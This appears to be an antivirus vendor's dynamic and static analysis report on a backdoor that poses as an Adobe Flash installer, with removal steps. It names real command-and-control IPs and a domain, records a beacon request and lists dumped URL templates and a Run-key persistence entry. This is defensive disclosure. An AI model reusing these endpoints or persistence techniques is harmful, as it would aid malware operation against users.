Gen.Variant.Kazy.224568_5f2cff16ea

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Backdoor creates the following process(es):

%original file name%.exe:1592
regedit.exe:452

The Backdoor injects its code into the following process(es):

svchost.exe:508

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process %original file name%.exe:1592 makes changes in the file system.

The Backdoor creates and/or writes to the following file(s):

C:\RCXB2.tmp (23552 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1844237615-1960408961-1801674531-1003\c5b88721db08c824db69d0bbc702beb8_75ed9567-aa58-4c8e-a8ea-3cad7c47ab03 (44 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4$@2.dat (48 bytes)
C:\%original file name%.exe.tmp1 (373 bytes)

The Backdoor deletes the following file(s):

C:\%original file name%.exe.tmp1 (0 bytes)

Registry activity

The process %original file name%.exe:1592 makes changes in the system registry.

The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 90 2E D8 2E 7F 59 4C 29 EC C2 16 F3 39 37 75"

The process regedit.exe:452 makes changes in the system registry.

The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AE FC FB 1F 5E 8D 84 ED A2 BE 56 D8 FE 51 76 9C"

To automatically run itself each time Windows is booted, the Backdoor adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Netlogon" = "%Documents and Settings%\%current user%\Local Settings\Netlogon.exe"

Dropped PE files

MD5	File path
0d95cd931e3c5ea5189bd62e5046a06c	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Netlogon.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):

   %original file name%.exe:1592
   regedit.exe:452
   

2. Delete the original Backdoor file.
   
3. Delete or disinfect the following files created/modified by the Backdoor:

   C:\RCXB2.tmp (23552 bytes)
   %Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1844237615-1960408961-1801674531-1003\c5b88721db08c824db69d0bbc702beb8_75ed9567-aa58-4c8e-a8ea-3cad7c47ab03 (44 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\4$@2.dat (48 bytes)
   C:\%original file name%.exe.tmp1 (373 bytes)

4. Delete the following value(s) in the autorun key (How to Work with System Registry):

   [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   "Netlogon" = "%Documents and Settings%\%current user%\Local Settings\Netlogon.exe"

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name: Adobe Systems, Inc.
Product Name: Flash? Player Installer/Uninstaller
Product Version: 10,1,53,64
Legal Copyright: Copyright ? 1996-2010 Adobe, Inc.
Legal Trademarks: Adobe? Flash? Player
Original Filename: FlashUtil.exe
Internal Name: Adobe? Flash? Player Installer/Uninstaller 10.1
File Version: 10,1,53,64
File Description: Adobe? Flash? Player Installer/Uninstaller 10.1 r53
Comments:
Language: English (United Kingdom)

Company Name: Adobe Systems, Inc.Product Name: Flash? Player Installer/UninstallerProduct Version: 10,1,53,64Legal Copyright: Copyright ? 1996-2010 Adobe, Inc.Legal Trademarks: Adobe? Flash? PlayerOriginal Filename: FlashUtil.exeInternal Name: Adobe? Flash? Player Installer/Uninstaller 10.1File Version: 10,1,53,64File Description: Adobe? Flash? Player Installer/Uninstaller 10.1 r53Comments: Language: English (United Kingdom)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	4392	4608	5.22695	bf48a645ffb85332520181c052d19e41
.rdata	12288	1045	1536	2.51569	b09e1f7c28fc22c6f6859d92fabdae15
.data	16384	927	512	2.52989	156b9f597adf1f082cf0a831730382cc
.rsrc	20480	12996	13312	5.42436	f916dec20651b1f32659a1a7d5f0da1d

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 2
cb6f641748ece725b667597dd1a4a14c
cbaa311d0ebe07dba6b3cf3b9324f18b

Network Activity

URLs

URL	IP
hxxp://71.41.214.210/hggla.php?id=004495111D307928CC
yahoofacebook.345.pl	60.249.95.143

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /hggla.php?id=004495111D307928CC HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: 71.41.214.210

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 404 Not Found

Server: thttpd/2.19-MX Mar 4 2013

Content-type: text/html

Date: Mon, 13 Oct 2014 22:25:48 GMT

Last-modified: Mon, 13 Oct 2014 22:25:48 GMT

Accept-Ranges: bytes

Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN". "http://VVV.w3.org/TR/html4/loose.dtd">.<html>.<head>.<meta http-equiv='X-UA-Compatible' content='IE=EmulateIE9' />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.<meta http-equiv="Content-Script-Type" content="text/javascript">.<meta http-equiv="Content-Style-Type" content="text/css">.<meta name="publisher" content="MOBOTIX AG, Germany">.<meta name="copyright" content="MOBOTIX AG, Germany">.<link rel="SHORTCUT ICON" href="/favicon.ico">.<link rel="apple-touch-icon" href="/apple-touch-icon.png">.<meta name="author" content="Daniel Kabs, MOBOTIX AG, Germany">.<link rel="owner" href="mailto:info@mobotix.com">.<link rel="copyright" href="/about.html" title="Copyright">..<style type='text/css'>.body {. font-family:Helvetica,Arial,sans-serif;. font-size:80%;.}.pre,textarea { font-family:monospace; }..headtablesmall { font-size:125%; }..standard {} /* obsolete */..mxSubmitButton {. width: 110px;. margin:2px 0;.}..mxErrorMessage {. color:red;. background-color:yellow;. font-weight:bold;. padding:5px;.}..mxFooterWarning {. padding:5px;. margin:0;. background-color:#DDDDDD;. color:red;. font-weight:bold;.}..mxFooterNote {. padding:5px;. margin:0;. background-color:#DDDDDD;.}..mxSubmitbuttonsRow {. background-color:#DDDDDD;. border-collapse:collapse;.}..mxSubmitbuttonsRow td {. padding:5px;.}..mxReadOnly {. background:#eee

<<< skipped >>>

Map

The Backdoor connects to the servers at the folowing location(s):

Strings from Dumps

svchost.exe_508:

.text

.text

`.rdata

`.rdata

@.data

@.data

SSh@C@

SSh@C@

MFC42.DLL

MFC42.DLL

MSVCRT.dll

MSVCRT.dll

_acmdln

_acmdln

WinExec

WinExec

KERNEL32.dll

KERNEL32.dll

USER32.dll

USER32.dll

ADVAPI32.dll

ADVAPI32.dll

HttpQueryInfoA

HttpQueryInfoA

InternetOpenUrlA

InternetOpenUrlA

HttpSendRequestA

HttpSendRequestA

HttpOpenRequestA

HttpOpenRequestA

WININET.dll

WININET.dll

WS2_32.dll

WS2_32.dll

iphlpapi.dll

iphlpapi.dll

SHLWAPI.dll

SHLWAPI.dll

71.56.69.34

71.56.69.34

71.41.214.210

71.41.214.210

yahoofacebook.345.pl

yahoofacebook.345.pl

regedit.exe /s

regedit.exe /s

~dfds3.reg

~dfds3.reg

Windows Registry Editor Version 5.00

Windows Registry Editor Version 5.00

"%s"="%s"

"%s"="%s"

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

WinHttp

WinHttp

%s.tmp1

%s.tmp1

4$@2.dat

4$@2.dat

hXXp://%s:%d/%s.php?id=d%s&ext=%s

hXXp://%s:%d/%s.php?id=d%s&ext=%s

/%s.php?id=d%s&ext=%s

/%s.php?id=d%s&ext=%s

hXXp://%s:%d/%s.php?id=d%s

hXXp://%s:%d/%s.php?id=d%s

%c%c%c%c%c

%c%c%c%c%c

/%s.php?id=d%s

/%s.php?id=d%s

%%temp%%\%u

%%temp%%\%u

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

HTTP/1.1

HTTP/1.1